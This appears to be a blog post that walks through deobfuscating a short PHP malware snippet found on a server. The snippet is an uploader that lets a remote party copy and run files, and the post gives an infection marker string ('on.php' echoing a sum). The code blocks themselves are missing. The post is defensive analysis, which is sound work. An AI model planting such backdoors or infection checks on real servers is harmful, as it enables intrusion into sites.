I came across the bit of code posted below today while browsing Stack Overflow. The user who posted the question was asking what this bit of code actually did. He was aware that it was malicious due to the fact that it was on his server without his knowledge, and obfuscated. Unfortunately the question was marked as off topic, “Questions asking us to recommend or find a book, tool, software library, tutorial or other off-site resource are off-topic”.
A few users commented stating that they wouldn’t take the time deobfuscate the code, to not bother and just remove it from the server, etc. I thought the question was closed rather prematurely, because it is indeed related to programming. It’s also no more time consuming to reverse engineer this than it is to answer most other questions on Stack Overflow. I don’t subscribe to the philosophy that if you find a short snippet of obfuscated code on your server, you remove it without even attempting to see what it’s doing.
Since this snippet is very short, and easily deobfuscated, here’s how it’s done in a few steps.
Step 0: Original Obfuscated Code
Step 1: Human Readable Obfuscated Code
Things become significantly easier to read once we simply add some tabs and line breaks. Go through the code, and find semicolons in order to make things easier to read. After that, add some comments of your own to see what’s good so far.
Step 2: Quick & Dirty Decoder
In order to decode this entirely, without pissing away too much time, just use common sense. We’ll decode the script with itself by adding some comments to remove the malicious code we don’t want to run, and echos to see what these
base64 string really are. Essentially we’re just creating a clean printout of all the
Here’s what we see when we run our janky little decoder.
~/Lab$ php ./test.php 8194460 base64_decode copy id up up file tmp_name file file
Step 3: Deobfuscated Script
Reading our decoder’s printout from the top down, it’s pretty easy to replace the obfuscated strings with our deobfuscated strings. After doing so, here’s what we wind up with. The whole script is rather short compared to all the initial gibberish.
It doesn’t tell us a whole lot about what the malware actually does on the victims system, because all we can see is that there’s a remote server copying and executing files. What you can tell though, is that if this was on your server, you’d absolutely need to be looking for other malicious files, because this was there to facilitate their transfer.
This code looks like it infected a lot of PHP applications out in the wild. A simple Google query for
echo 7457737+736723; reveals many WordPress, Drupal, OpenCart, and various other PHP applications infected. It’s likely installed via an infected plugin built for any of those systems, vulnerabilities in them, or issues with the hosts on which they’re running.
Through a search for the code on GitHub I was able to find an infected Russian store. Within their repository there is a file titled
on.php which simply contains
<?php echo 7457737+736723;?>. I presume this signifies that the host is infected successfully, and that PHP is running. After searching through their commit log I can see that the directory once contained additional obfuscated files.
While I’d like to take the time to clean these files up as well, I haven’t yet done so. It seems that accesson.php is the one most people are talking about.
Here is the original question.